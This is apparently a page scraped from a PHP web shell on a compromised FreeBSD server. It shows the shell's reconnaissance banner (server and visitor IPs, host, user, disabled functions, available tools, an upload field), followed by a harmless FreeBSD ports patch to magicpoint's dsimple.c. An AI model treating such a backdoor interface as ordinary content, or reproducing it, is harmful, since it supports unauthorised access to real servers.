| Server IP : 82.208.35.60 / Your IP : 216.73.217.33 Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31 System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64 User : studiokobylisy_cz ( 1008) PHP Version : 7.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /usr/ports/misc/magicpoint/files/ |
Upload File : |
--- contrib/xwintoppm/dsimple.c.orig 1998-02-13 07:48:29 UTC
+++ contrib/xwintoppm/dsimple.c
@@ -55,6 +55,10 @@ void out();
void blip();
Window Window_With_Name();
void Fatal_Error();
+void usage(void);
+
+/* forward */
+void outl();
/*
* Just_display: A group of routines designed to make the writting of simple
@@ -495,6 +499,7 @@ Window Window_With_Name(dpy, top, name)
* printf with up to 7 arguments.
*/
/* VARARGS1 */
+void
outl(msg, arg0,arg1,arg2,arg3,arg4,arg5,arg6)
char *msg;
char *arg0, *arg1, *arg2, *arg3, *arg4, *arg5, *arg6;